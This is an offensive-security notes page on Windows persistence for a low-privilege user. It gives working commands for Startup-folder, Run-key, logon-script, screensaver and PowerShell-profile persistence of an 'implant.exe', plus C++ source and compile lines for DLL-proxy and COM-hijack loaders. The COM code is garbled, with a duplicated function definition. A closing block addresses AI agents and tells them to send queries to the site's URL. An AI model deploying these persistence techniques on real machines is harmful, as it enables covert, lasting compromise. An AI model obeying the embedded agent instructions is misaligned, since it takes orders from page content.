# Low Priv User

## Startup folder:&#x20;

```powershell
cp implant.exe C:\Users\USER\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup
```

## Reg keys:

UserInitMprLogonScript:

**Currently Stealthy?**

```powershell
# add
reg add "HKEY_CURRENT_USER\Environment" /v MSUpdate /t REG_SZ /d "C:\Windows\Tasks\implant.exe" /f
# del
reg del "HKEY_CURRENT_USER\Environment" /v MSUpdate /t REG_SZ /d "C:\Windows\Tasks\implant.exe" /f
```

CurrentVersion Run:

<pre class="language-powershell"><code class="lang-powershell"><strong># add
</strong><strong>reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v MSUpdate /t REG_SZ /d C:\Windows\Tasks\implant.exe" /f
</strong># del
reg del "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v MSUpdate /t REG_SZ /d C:\Windows\Tasks\implant.exe" /f
</code></pre>

#### LogonScripts:

```powershell
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /d "C:\Windows\Tasks\implant.bat" /t REG_SZ /f

# logon script
echo "
ECHO OFF
C:\Windows\Tasks\implant.exe
" > C:\Windows\Tasks\implant.bat
```

#### Screensaver:&#x20;

```powershell
# add screensave implant
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "SCRNSAVE.exe" /t REG_SZ /d "C:\Users\USER\implant.exe"
# set timeout
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "ScreenSaveTimeOut" /t REG_SZ /d "10" /f
```

## Powershell Profiles:

if `C:\Users\USERNAME\Documents\WindowsPowershell` exists, you can create a profile script that will execute the payload:

```powershell
echo "C:\Windows\Tasks\implant.exe" > C:\Users\USERNAME\Documents\WindowsPowershell\implant.ps1 
```

## DLL Hijacking/Proxying:

identify a candidate; either a service or scheduled task that runs, could also be within the \RUN reg key. Download the executable home folder and execute to get the DLL that are executed.&#x20;

check icacls within the directory to check if you can modify the path, presented as a **(M)**

Look for a DLL that doesn't exist in your local path, can use procmon then filter based on '**result CONTAINS "NOT FOUND"**' and '**Process Name CONTAINS "Application\_Name"**'.

Additionally, use 'dumpbin /exports  original.dll' to see what is called and what libraries they include. The pragma comment needs to be performed for all the calls to ensure the app works properly.

#### Create DLL:&#x20;

```cpp

// Add a linker to the original DLL:
    // the first, is for OpenPrinterA which is called using HEX 8F (143 decimal) goes after the @
    // decimal can be translated in python "python -c print(int(0x8f), int(0x4d), int(0x1d))"
    // update the linker to all calls
#pragma comment(linker,"/export:DLL_CALL_HERE=winsplhlp.DLL_CALL_HERE,@143")
#pragma comment(linker,"/export:DLL_CALL_HERE=winsplhlp.DLL_CALL_HERE,@79")
#pragma comment(linker,"/export:DLL_CALL_HERE=winsplhlp.DLL_CALL_HERE,@29")

// if the call doesn't have a function, (i.e. NONAME) use the #100 (100 = the ordinal name)
#pragma comment(linker,"/export:NONAME=winsplhlp.#100,@100,NONAME")

#include <Windows.h>

void Go(void) {
    STARTUPINFO info={sizeof(info)};
    PROCESS_INFORMATION processInfo;
        CreateProcess(
					"c:\\Windows\\Tasks \\implant.exe", 
					"", NULL, NULL, TRUE, 0, NULL, NULL, 
					&info, &processInfo);
}

BOOL APIENTRY DllMain(HMODULE hModule,  DWORD  ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call)  {
    case DLL_PROCESS_ATTACH:
		Go();
		break;
    case DLL_THREAD_ATTACH:
		break;
    case DLL_THREAD_DETACH:
		break;
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
```

compile it using the following:&#x20;

```batch
cl.exe /W0 /D_USRDLL /D_WINDLL winspool.cpp /MT /link /DLL /OUT:winspool.drv
```

copy the new dll and the original DLL and rename is to 'winsplhlp.dll' then place within the application folder.

## COM-Based hijacking/proxying:&#x20;

&#x20;com objects referenced by GUIDs and can live on remote machine. When an app calls functions to a dll, calls SCM for the guid, queries local (machine and user) registry (HKEY\_CLASSES\_ROOT -> \SOFTWARE\CLASSES\CLSID). If found, loads the DLL. Can edit the \Software\CLASSES hive under user.

Can also be implemented as EXE files (process loading), still looks at the reg, tags the EXE starts a new process and the com-object lives in that process. called via RPC&#x20;

If a remote machine, will be called SCM as remote, same as RPC

#### check scheduled tasks:&#x20;

```
schtasks.exe /query /xml > tasks.xml
```

within the **\<Actions>\</Actions>** sections, look for **\<ComHandler>\</ComHandler>** and within the **\<Triggers>\</Triggers>** look for persistence mechanisms i.e. logon. Once you have identified, query the CSID:&#x20;

```powershell
reg query "HKCR\CLSID\{123123123-1231-2123-1231-2312312312}"
reg query "HKCR\CLSID\{123123123-1231-2123-1231-2312312312}\service" 
# or could be in local machine:
reg query "HKLM\Software\Classes\CLSID\{123123123-1231-2123-1231-2312312312}\Service"
# or could be in current user: 
reg query "HKCU\Software\Classes\CLSID\{123123123-1231-2123-1231-2312312312}\Service"

# export: 
reg export "HKCU\Software\Classes\CLSID\{123123123-1231-2123-1231-2312312312}\Service" C:\Windows\Temp
```

Create the CPP file:&#x20;

```cpp
#include <Windows.h>
#include <combaseapi.h>

BOOL APIENTRY DllMain(HMODULE hModule,  DWORD  ul_reason_for_call, LPVOID lpReserved) {
    STARTUPINFO info={sizeof(info)};
    PROCESS_INFORMATION processInfo;

    switch (ul_reason_for_call)  {
    case DLL_PROCESS_ATTACH:
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;    
	case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

HRESULT STDAPI DllGetClassObject(__in REFCLSID rclsid,
								__in REFIID riid,
								__deref_out LPVOID FAR* ppv) { 
	STARTUPINFO info={sizeof(info)};
        PROCESS_INFORMATION processInfo;
	typedef HRESULT(WINAPI * tDllGetClassObject)(REFCLSID rclsid, REFIID riid, LPVOID* ppv);
tDllGetClassObject pDllGetClassObject;

HRESULT STDAPI DllGetClassObject(REFCLSID rclsid,
								 REFIID riid,
								 LPVOID FAR* ppv) { 
	STARTUPINFO info={sizeof(info)};
    PROCESS_INFORMATION processInfo;
	HMODULE hOrigDLL;
	
	/* load the implant */
	CreateProcess(
				"c:\\Windows\\Tasks\\implant.exe", 
				"", NULL, NULL, TRUE, 0, NULL, NULL, 
				&info, &processInfo);
	
	/* load the original DLL */
	hOrigDLL = LoadLibrary("C:\\Windows\\System32\\WorkFoldersShell.dll");
	pDllGetClassObject = (tDllGetClassObject) GetProcAddress(hOrigDLL, "DllGetClassObject");
	if (!pDllGetClassObject)
		return S_FALSE;
	
	HRESULT hRes = pDllGetClassObject(rclsid, riid, ppv);
	
	return hRes;
} 
```

Create the DEF file:

```batch
LIBRARY
EXPORTS
  DllGetClassObject PRIVATE
```

Compile:

```batch
cl.exe /W0 /D_USRDLL /D_WINDLL WorkFoldersShell.cpp WorkFoldersShell.def /MT /link /DLL /OUT:WrkFoldersShell.dll
```

Update the exported registry to reflect the area where you want to store the new file. i.e. instead of 'HKEY\_LOCAL\_MACHINE' change to 'HKEY\_CURRENT\_USER'. also update the path of the DLL/EXE and save the file, then upload:

```powershell
reg import task.reg /reg:64
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://f1rstbyt3.gitbook.io/hacking-notes/command-and-control/persistence/low-priv-user.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.